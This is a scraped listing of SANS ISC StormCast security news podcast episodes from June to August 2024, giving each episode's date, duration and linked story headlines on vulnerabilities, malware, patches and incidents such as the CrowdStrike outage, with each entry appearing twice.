Script Obfuscation Using Multiple Instances of the Same Function https://isc.sans.edu/diary/Script%20obfuscation%20using%20multiple%20instances%20of%20the%20same%20function/31144 Disclosure of key technical details of CrowdStrike's large-scale blue screen https://mp.weixin.qq.com/s/uD7mhzyRSX1dTW-TMg4UhQ New OFBiz Vulnerability https://issues.apache.org/jira/browse/OFBIZ-13128 https://www.youtube.com/watch?v=J_IxCBjd4Pw Roundcube XSS Vulnerabilities https://securityonline.info/roundcube-webmail-releases-security-updates-to-patch-multiple-vulnerabilities/
8/6/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, August 5th, 2024

Current Secure Boot Certifiate Authority Expires in 2026 https://isc.sans.edu/diary/Even+Linux+users+should+take+a+look+at+this+Microsoft+KB+article/31140 OOXML Spreadsheets Protected by Verifier Hashes https://isc.sans.edu/diary/OOXML%20Spreadsheets%20Protected%20By%20Verifier%20Hashes/31072 StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/ DARPA TRACTOR Program for Translating C to Rust https://www.darpa.mil/news-events/2024-07-31a
8/5/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, August 5th, 2024

Current Secure Boot Certifiate Authority Expires in 2026 https://isc.sans.edu/diary/Even+Linux+users+should+take+a+look+at+this+Microsoft+KB+article/31140 OOXML Spreadsheets Protected by Verifier Hashes https://isc.sans.edu/diary/OOXML%20Spreadsheets%20Protected%20By%20Verifier%20Hashes/31072 StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/ DARPA TRACTOR Program for Translating C to Rust https://www.darpa.mil/news-events/2024-07-31a
8/5/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, August 2nd, 2024

Tracking Proxy Scans with IPv4.Games https://isc.sans.edu/diary/Tracking%20Proxy%20Scans%20with%20IPv4.Games/31136 Threat Actor Impersonates Google via Fake Ad For Authenticator https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator Who Knew? Domain Hijacking is so easy https://blogs.infoblox.com/threat-intelligence/who-knew-domain-hijacking-is-so-easy/
8/2/20246 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, August 2nd, 2024

Tracking Proxy Scans with IPv4.Games https://isc.sans.edu/diary/Tracking%20Proxy%20Scans%20with%20IPv4.Games/31136 Threat Actor Impersonates Google via Fake Ad For Authenticator https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator Who Knew? Domain Hijacking is so easy https://blogs.infoblox.com/threat-intelligence/who-knew-domain-hijacking-is-so-easy/
8/2/20246 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, August 1st, 2024

Increased Activity Against Apache OFBiz CVS-2024-32113 https://isc.sans.edu/diary/Increased%20Activity%20Against%20Apache%20OFBiz%20CVE-2024-32113/31132 Digicert Certificate Revocation Incident https://www.digicert.com/support/certificate-revocation-incident Microsoft Azure Outage https://azure.status.microsoft/en-us/status/history/ Improving Security of Chrome Cookies https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
8/1/20246 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, August 1st, 2024

Increased Activity Against Apache OFBiz CVS-2024-32113 https://isc.sans.edu/diary/Increased%20Activity%20Against%20Apache%20OFBiz%20CVE-2024-32113/31132 Digicert Certificate Revocation Incident https://www.digicert.com/support/certificate-revocation-incident Microsoft Azure Outage https://azure.status.microsoft/en-us/status/history/ Improving Security of Chrome Cookies https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
8/1/20246 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, July 31st, 2024

Apple Updates Everything: July 2024 Edition https://isc.sans.edu/diary/Apple%20Patches%20Everything.%20July%202024%20Edition/31128 VMWare ESXi Vulnerability Actively Exploited CVE-2024-37085 https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ Weak VoWiFi Encryption CVE-2024-22064 https://idw-online.de/en/news837652
7/31/20245 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, July 31st, 2024

Apple Updates Everything: July 2024 Edition https://isc.sans.edu/diary/Apple%20Patches%20Everything.%20July%202024%20Edition/31128 VMWare ESXi Vulnerability Actively Exploited CVE-2024-37085 https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ Weak VoWiFi Encryption CVE-2024-22064 https://idw-online.de/en/news837652
7/31/20245 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, July 30th, 2024

CrowdStrike Outage Themed Maldoc https://isc.sans.edu/diary/CrowdStrike%20Outage%20Themed%20Maldoc/31116 HotJar XSS Puts OAuth at Risk https://salt.security/blog/over-1-million-websites-are-at-risk-of-sensitive-information-leakage---xss-is-dead-long-live-xss Proofpoint Echospoofing https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6
7/30/20245 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, July 30th, 2024

CrowdStrike Outage Themed Maldoc https://isc.sans.edu/diary/CrowdStrike%20Outage%20Themed%20Maldoc/31116 HotJar XSS Puts OAuth at Risk https://salt.security/blog/over-1-million-websites-are-at-risk-of-sensitive-information-leakage---xss-is-dead-long-live-xss Proofpoint Echospoofing https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6
7/30/20245 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, July 29th, 2024

ExelaStealer Delivered "From Russia With Love" https://isc.sans.edu/diary/31118 Create Your Own BSOD: NotMyFault https://isc.sans.edu/diary/Create%20Your%20Own%20BSOD%3A%20NotMyFault/31120 PKFail Vulnerability https://pk.fail/ CrowdStrike Recovery https://arstechnica.com/information-technology/2024/07/97-of-crowdstrike-systems-are-back-online-microsoft-suggests-windows-changes/
7/29/20246 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, July 29th, 2024

ExelaStealer Delivered "From Russia With Love" https://isc.sans.edu/diary/31118 Create Your Own BSOD: NotMyFault https://isc.sans.edu/diary/Create%20Your%20Own%20BSOD%3A%20NotMyFault/31120 PKFail Vulnerability https://pk.fail/ CrowdStrike Recovery https://arstechnica.com/information-technology/2024/07/97-of-crowdstrike-systems-are-back-online-microsoft-suggests-windows-changes/
7/29/20246 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, July 26th, 2024

X-Worm Hidden With Process Hollowing https://isc.sans.edu/diary/XWorm%20Hidden%20With%20Process%20Hollowing/31112 Anyone Can Access Deleted and Private Repo Data on GitHub https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github Google Chrome Scanning Encrypted Files https://arstechnica.com/security/2024/07/google-overhauls-chromes-safe-browsing-protection-to-scan-password-protected-files/
7/26/20245 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, July 26th, 2024

X-Worm Hidden With Process Hollowing https://isc.sans.edu/diary/XWorm%20Hidden%20With%20Process%20Hollowing/31112 Anyone Can Access Deleted and Private Repo Data on GitHub https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github Google Chrome Scanning Encrypted Files https://arstechnica.com/security/2024/07/google-overhauls-chromes-safe-browsing-protection-to-scan-password-protected-files/
7/26/20245 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, July 25th, 2024

"Mouse Logger" Malicious Python Script https://isc.sans.edu/diary/%22Mouse%20Logger%22%20Malicious%20Python%20Script/31106 Crowdstrike Preliminary Post Incident Review https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/ How a North Korean Fake IT Worker Tried to Infiltrate Us https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us
7/25/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, July 25th, 2024

"Mouse Logger" Malicious Python Script https://isc.sans.edu/diary/%22Mouse%20Logger%22%20Malicious%20Python%20Script/31106 Crowdstrike Preliminary Post Incident Review https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/ How a North Korean Fake IT Worker Tried to Infiltrate Us https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us
7/25/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, July 24th, 2024

New Exploit Variation Against D-Link NAS Devices https://isc.sans.edu/diary/New%20Exploit%20Variation%20Against%20D-Link%20NAS%20Devices%20%28CVE-2024-3273%29/31102 APKs Masquerading as Videos on Telegram https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/ Goodbye Attackers can Bypass Windows Hello Strong Authentication https://www.darkreading.com/endpoint-security/goodbye-attackers-can-bypass-windows-hello-strong-authentication Let's Encrypt Intends to End OCSP Service https://letsencrypt.org/2024/07/23/replacing-ocsp-with-crls.html Google Third-Party Cookies are hanging around https://privacysandbox.com/intl/en_us/news/privacy-sandbox-update/
7/24/20246 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, July 24th, 2024

New Exploit Variation Against D-Link NAS Devices https://isc.sans.edu/diary/New%20Exploit%20Variation%20Against%20D-Link%20NAS%20Devices%20%28CVE-2024-3273%29/31102 APKs Masquerading as Videos on Telegram https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/ Goodbye Attackers can Bypass Windows Hello Strong Authentication https://www.darkreading.com/endpoint-security/goodbye-attackers-can-bypass-windows-hello-strong-authentication Let's Encrypt Intends to End OCSP Service https://letsencrypt.org/2024/07/23/replacing-ocsp-with-crls.html Google Third-Party Cookies are hanging around https://privacysandbox.com/intl/en_us/news/privacy-sandbox-update/
7/24/20246 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, July 23rd, 2024

CrowdStrike Update https://isc.sans.edu/diary/CrowdStrike%3A%20The%20Monday%20After/31098 https://www.theregister.com/2024/07/21/crowdstrike_linux_crashes_restoration_tools/ Keynote Recording https://www.sans.org/services/video-player/?key=1goL2vPrltnj
7/23/20245 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, July 23rd, 2024

CrowdStrike Update https://isc.sans.edu/diary/CrowdStrike%3A%20The%20Monday%20After/31098 https://www.theregister.com/2024/07/21/crowdstrike_linux_crashes_restoration_tools/ Keynote Recording https://www.sans.org/webcasts/sansfire-2024-keynote-25-years-of-the-internet-storm-center-time-traveling-through-sensor-data/
7/23/20245 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, July 22nd, 2024

Widespread Windows Crashes Due to Crowdstrike Updates https://isc.sans.edu/diary/Widespread%20Windows%20Crashes%20Due%20to%20Crowdstrike%20Updates/31094 https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/ https://www.crowdstrike.com/blog/falcon-update-for-windows-hosts-technical-details/ https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959
7/22/20248 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, July 22nd, 2024

Widespread Windows Crashes Due to Crowdstrike Updates https://isc.sans.edu/diary/Widespread%20Windows%20Crashes%20Due%20to%20Crowdstrike%20Updates/31094 https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/ https://www.crowdstrike.com/blog/falcon-update-for-windows-hosts-technical-details/ https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959
7/22/20248 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, July 19th, 2024

Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujul2024.html Exchange Online Implementing Inbound SMTP DANE with DNSSEC https://techcommunity.microsoft.com/t5/exchange-team-blog/announcing-public-preview-of-inbound-smtp-dane-with-dnssec-for/ba-p/4155257 VPN Port Shadowing Vulnerability https://petsymposium.org/popets/2024/popets-2024-0070.pdf
7/19/20245 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, July 19th, 2024

Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujul2024.html Exchange Online Implementing Inbound SMTP DANE with DNSSEC https://techcommunity.microsoft.com/t5/exchange-team-blog/announcing-public-preview-of-inbound-smtp-dane-with-dnssec-for/ba-p/4155257 VPN Port Shadowing Vulnerability https://petsymposium.org/popets/2024/popets-2024-0070.pdf
7/19/20245 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, July 18th, 2024

Who You Gonna Call: Androx Gh0st Busters! https://isc.sans.edu/diary/Who%20You%20Gonna%20Call%3F%20AndroxGh0st%20Busters!%20%5BGuest%20Diary%5D/31086 Cisco Smart Software Manager Vulnerability CVE-2024-20419 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy Critical Security Flaw in Cisco Secure Email Gateway: CVE-2024-20401 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH Microsoft Introducing Checkpoint Updates https://techcommunity.microsoft.com/t5/windows-it-pro-blog/introducing-windows-11-checkpoint-cumulative-updates/ba-p/4182552 GeoServer Patches https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
7/18/20246 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, July 18th, 2024

Who You Gonna Call: Androx Gh0st Busters! https://isc.sans.edu/diary/Who%20You%20Gonna%20Call%3F%20AndroxGh0st%20Busters!%20%5BGuest%20Diary%5D/31086 Cisco Smart Software Manager Vulnerability CVE-2024-20419 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy Critical Security Flaw in Cisco Secure Email Gateway: CVE-2024-20401 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH Microsoft Introducing Checkpoint Updates https://techcommunity.microsoft.com/t5/windows-it-pro-blog/introducing-windows-11-checkpoint-cumulative-updates/ba-p/4182552 GeoServer Patches https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
7/18/20246 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, July 17th, 2024

Reply Chain Phishing With a Twist https://isc.sans.edu/diary/%22Reply-chain%20phishing%22%20with%20a%20twist/31084 Claroty TP-Link and Synology IP Camera Exploits https://claroty.com/team82/research/pivoting-from-wan-to-lan-synology-bc500-ip-camera https://claroty.com/team82/research/pwn2own-wan-to-lan-exploit-showcase Cosmic Sting Hits Adobe Commerce Stores https://sansec.io/research/cosmicsting-hitting-major-stores
7/17/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, July 17th, 2024

Reply Chain Phishing With a Twist https://isc.sans.edu/diary/%22Reply-chain%20phishing%22%20with%20a%20twist/31084 Claroty TP-Link and Synology IP Camera Exploits https://claroty.com/team82/research/pivoting-from-wan-to-lan-synology-bc500-ip-camera https://claroty.com/team82/research/pwn2own-wan-to-lan-exploit-showcase Cosmic Sting Hits Adobe Commerce Stores https://sansec.io/research/cosmicsting-hitting-major-stores
7/17/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, July 16th, 2024

Protected OOXML Spreadsheets https://isc.sans.edu/diary/Protected%20OOXML%20Spreadsheets/31070 Leaked PyPi Secret Token Revealed in Binary https://jfrog.com/blog/leaked-pypi-secret-token-revealed-in-binary-preventing-suppy-chain-attack/ Microsoft 365 Defender Affected by June Update https://learn.microsoft.com/en-us/windows/release-health/status-windows-server-2022#network-data-reporting-from-microsoft-365-defender-may-be-interrupted
7/16/20245 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, July 16th, 2024

Protected OOXML Spreadsheets https://isc.sans.edu/diary/Protected%20OOXML%20Spreadsheets/31070 Leaked PyPi Secret Token Revealed in Binary https://jfrog.com/blog/leaked-pypi-secret-token-revealed-in-binary-preventing-suppy-chain-attack/ Microsoft 365 Defender Affected by June Update https://learn.microsoft.com/en-us/windows/release-health/status-windows-server-2022#network-data-reporting-from-microsoft-365-defender-may-be-interrupted
7/16/20245 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, July 15th, 2024

16-Bit Hash Collisions in XLS Spreadsheets https://isc.sans.edu/diary/16-bit%20Hash%20Collisions%20in%20.xls%20Spreadsheets/31066 Attacks against the "Nette" PHP framework CVE-2020-15227 https://isc.sans.edu/forums/diary/Attacks+against+the+Nette+PHP+framework+CVE202015227/31076/ Squarespace Hijacked Domains https://github.com/security-alliance/advisories/blob/main/2024-07-squarespace.pdf
7/15/20246 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, July 15th, 2024

16-Bit Hash Collisions in XLS Spreadsheets https://isc.sans.edu/diary/16-bit%20Hash%20Collisions%20in%20.xls%20Spreadsheets/31066 Attacks against the "Nette" PHP framework CVE-2020-15227 https://isc.sans.edu/forums/diary/Attacks+against+the+Nette+PHP+framework+CVE202015227/31076/ Squarespace Hijacked Domains https://github.com/security-alliance/advisories/blob/main/2024-07-squarespace.pdf
7/15/20246 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, July 12th, 2024

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots https://isc.sans.edu/diary/Understanding%20SSH%20Honeypot%20Logs%3A%20Attackers%20Fingerprinting%20Honeypots/31064 Patch or Peril: A Veeam Vulnerability Incident https://www.group-ib.com/blog/estate-ransomware/ Juniper Patches https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&f:ctype=[Security%20Advisories] VMWare Aria Automation SQL Injection Vuln; https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24598 Leaked SMS Messages https://www.ccc.de/de/updates/2024/2fa-sms
7/12/20247 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, July 12th, 2024

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots https://isc.sans.edu/diary/Understanding%20SSH%20Honeypot%20Logs%3A%20Attackers%20Fingerprinting%20Honeypots/31064 Patch or Peril: A Veeam Vulnerability Incident https://www.group-ib.com/blog/estate-ransomware/ Juniper Patches https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&f:ctype=[Security%20Advisories] VMWare Aria Automation SQL Injection Vuln; https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24598 Leaked SMS Messages https://www.ccc.de/de/updates/2024/2fa-sms
7/12/20247 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, July 11th, 2024

Finding Honeypot Data Clusters Using DBSCAN Part 1 https://isc.sans.edu/diary/Finding%20Honeypot%20Data%20Clusters%20Using%20DBSCAN%3A%20Part%201/31050 Second RegreSSHion Like OpenSSH Vulnerability https://lwn.net/ml/all/[email protected]/ Resurrecting Internet Explorer: Threat Actors Using Zero-Day Tricks in Internet Shortcut File CVE-2024-38112 https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/ SharePoint Proof of Concept Exploit CVE-2024-38094 CVE-2024-38024 CVE-2024-38023 https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC/blob/main/poc_filtered.py Citrix Netscaler, Agent and SDX Security Bulletin CVE-2024-6235 CVE-2024-6236 https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-sdx-security-bulletin-for-cve20246235-and-cve20246236 OpenVPN Updates https://openvpn.net/security-advisory/ovpnx-vulnerability-cve-2024-27903-cve-2024-27459-cve-2024-24974/
7/11/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, July 11th, 2024

Finding Honeypot Data Clusters Using DBSCAN Part 1 https://isc.sans.edu/diary/Finding%20Honeypot%20Data%20Clusters%20Using%20DBSCAN%3A%20Part%201/31050 Second RegreSSHion Like OpenSSH Vulnerability https://lwn.net/ml/all/[email protected]/ Resurrecting Internet Explorer: Threat Actors Using Zero-Day Tricks in Internet Shortcut File CVE-2024-38112 https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/ SharePoint Proof of Concept Exploit CVE-2024-38094 CVE-2024-38024 CVE-2024-38023 https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC/blob/main/poc_filtered.py Citrix Netscaler, Agent and SDX Security Bulletin CVE-2024-6235 CVE-2024-6236 https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-sdx-security-bulletin-for-cve20246235-and-cve20246236 OpenVPN Updates https://openvpn.net/security-advisory/ovpnx-vulnerability-cve-2024-27903-cve-2024-27459-cve-2024-24974/
7/11/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, July 10th, 2024

Microsoft Patch Tuesday July 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20July%202024/31058 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html RADIUS protocol susceptible to forgery attacks https://kb.cert.org/vuls/id/456537 https://www.inkbridgenetworks.com/blastradius/faq
7/10/20246 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, July 10th, 2024

Microsoft Patch Tuesday July 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20July%202024/31058 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html RADIUS protocol susceptible to forgery attacks https://kb.cert.org/vuls/id/456537 https://www.inkbridgenetworks.com/blastradius/faq
7/10/20246 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, July 9th, 2024

Kunai: Keep an Eye on your Linux Hosts Activity https://isc.sans.edu/diary/Kunai%3A%20Keep%20an%20Eye%20on%20your%20Linux%20Hosts%20Activity/31054 Decryptor for DoNex Ransomware https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/ Shelltorch Explained: Multiple Vulnerabilities in Pytorch Model Server (Torchserve) https://www.oligo.security/blog/shelltorch-explained-multiple-vulnerabilities-in-pytorch-model-server Exim Bypass Attachment Inspection https://bugs.exim.org/show_bug.cgi?id=3099#c4 Toshiba/Sharp Printer vulnerabilities https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html
7/9/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, July 9th, 2024

Kunai: Keep an Eye on your Linux Hosts Activity https://isc.sans.edu/diary/Kunai%3A%20Keep%20an%20Eye%20on%20your%20Linux%20Hosts%20Activity/31054 Decryptor for DoNex Ransomware https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/ Shelltorch Explained: Multiple Vulnerabilities in Pytorch Model Server (Torchserve) https://www.oligo.security/blog/shelltorch-explained-multiple-vulnerabilities-in-pytorch-model-server Exim Bypass Attachment Inspection https://bugs.exim.org/show_bug.cgi?id=3099#c4 Toshiba/Sharp Printer vulnerabilities https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html
7/9/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, July 8th, 2024

OpenSSH RegreSSHion Vulnerability https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt https://isc.sans.edu/diary/SSH%20%22regreSSHion%22%20Remote%20Code%20Execution%20Vulnerability%20in%20OpenSSH./31046 Overlooked Domain Name Resliency Issues: Registrar Communications https://isc.sans.edu/diary/Overlooked%20Domain%20Name%20Resiliency%20Issues%3A%20Registrar%20Communications/31048 Cloudflare 1.1.1.1 incident on Juine 27th 2024 https://blog.cloudflare.com/cloudflare-1111-incident-on-june-27-2024
7/8/20249 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, July 8th, 2024

OpenSSH RegreSSHion Vulnerability https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt https://isc.sans.edu/diary/SSH%20%22regreSSHion%22%20Remote%20Code%20Execution%20Vulnerability%20in%20OpenSSH./31046 Overlooked Domain Name Resliency Issues: Registrar Communications https://isc.sans.edu/diary/Overlooked%20Domain%20Name%20Resiliency%20Issues%3A%20Registrar%20Communications/31048 Cloudflare 1.1.1.1 incident on Juine 27th 2024 https://blog.cloudflare.com/cloudflare-1111-incident-on-june-27-2024
7/8/20249 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, June 28th, 2024

What Setting Live Traps For Cybercriminals Taught Me About Security https://isc.sans.edu/diary/What%20Setting%20Live%20Traps%20for%20Cybercriminals%20Taught%20Me%20About%20Security%20%5BGuest%20Diary%5D/31038 TeamViewer Compromise https://www.teamviewer.com/en-us/resources/trust-center/statement/ Fortra File Catalyst Vulnerability and PoC https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0 https://www.tenable.com/security/research/tra-2024-25 GitLab Critical Update https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ When Prompts Go Rogue: Analyzing a Prompt Injection Code Execution in Vanna.AI https://jfrog.com/blog/prompt-injection-attack-code-execution-in-vanna-ai-cve-2024-5565/
6/28/20247 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, June 28th, 2024

What Setting Live Traps For Cybercriminals Taught Me About Security https://isc.sans.edu/diary/What%20Setting%20Live%20Traps%20for%20Cybercriminals%20Taught%20Me%20About%20Security%20%5BGuest%20Diary%5D/31038 TeamViewer Compromise https://www.teamviewer.com/en-us/resources/trust-center/statement/ Fortra File Catalyst Vulnerability and PoC https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0 https://www.tenable.com/security/research/tra-2024-25 GitLab Critical Update https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ When Prompts Go Rogue: Analyzing a Prompt Injection Code Execution in Vanna.AI https://jfrog.com/blog/prompt-injection-attack-code-execution-in-vanna-ai-cve-2024-5565/
6/28/20247 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, June 27th, 2024

Critical Progress MOVEit Authentication Bypass Vulnerability https://labs.watchtowr.com/auth-bypass-in-un-limited-scenarios-progress-moveit-transfer-cve-2024-5806/ https://community.progress.com/s/article/MOVEit-Transfer-Product-Security-Alert-Bulletin-June-2024-CVE-2024-5806 Polyfill.io Supply Chain Attack https://cside.dev/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack Apple AirPods Firmware Update https://support.apple.com/en-us/HT214111
6/27/20246 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, June 27th, 2024

Critical Progress MOVEit Authentication Bypass Vulnerability https://labs.watchtowr.com/auth-bypass-in-un-limited-scenarios-progress-moveit-transfer-cve-2024-5806/ https://community.progress.com/s/article/MOVEit-Transfer-Product-Security-Alert-Bulletin-June-2024-CVE-2024-5806 Polyfill.io Supply Chain Attack https://cside.dev/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack Apple AirPods Firmware Update https://support.apple.com/en-us/HT214111
6/27/20246 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, June 26th, 2024

TCP Latency Sidechannel https://www.snailload.com/snailload.pdf Microsoft Management Console for Intial Access and Evasion https://www.elastic.co/security-labs/grimresource Wyze Camera Vulnerabilities https://forums.wyze.com/t/security-advisory/289256
6/26/20246 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, June 26th, 2024

TCP Latency Sidechannel https://www.snailload.com/snailload.pdf Microsoft Management Console for Intial Access and Evasion https://www.elastic.co/security-labs/grimresource Wyze Camera Vulnerabilities https://forums.wyze.com/t/security-advisory/289256
6/26/20246 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, June 25th, 2024

Configuration Scans Expand https://isc.sans.edu/diary/Configuration%20Scanners%20Adding%20Java%20Specific%20Configuration%20Files/31032 SQL Server Emergency Fix https://support.microsoft.com/en-us/topic/june-20-2024-kb5041054-os-build-20348-2529-out-of-band-b746ffbd-934e-42ac-9c66-ed0636edf7f1 Juniper Security Analytics Update https://supportportal.juniper.net/s/article/On-Demand-JSA-Series-Multiple-vulnerabilities-resolved-in-Juniper-Secure-Analytics-in-7-5-0-UP8-IF03?language=en_US MacOS/iOS XNU Buffer Overflow Exploit CVE-2024-27815 https://jprx.io/cve-2024-27815/
6/25/20245 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, June 25th, 2024

Configuration Scans Expand https://isc.sans.edu/diary/Configuration%20Scanners%20Adding%20Java%20Specific%20Configuration%20Files/31032 SQL Server Emergency Fix https://support.microsoft.com/en-us/topic/june-20-2024-kb5041054-os-build-20348-2529-out-of-band-b746ffbd-934e-42ac-9c66-ed0636edf7f1 Juniper Security Analytics Update https://supportportal.juniper.net/s/article/On-Demand-JSA-Series-Multiple-vulnerabilities-resolved-in-Juniper-Secure-Analytics-in-7-5-0-UP8-IF03?language=en_US MacOS/iOS XNU Buffer Overflow Exploit CVE-2024-27815 https://jprx.io/cve-2024-27815/
6/25/20245 minutes, 25 seconds
Episode Artwork

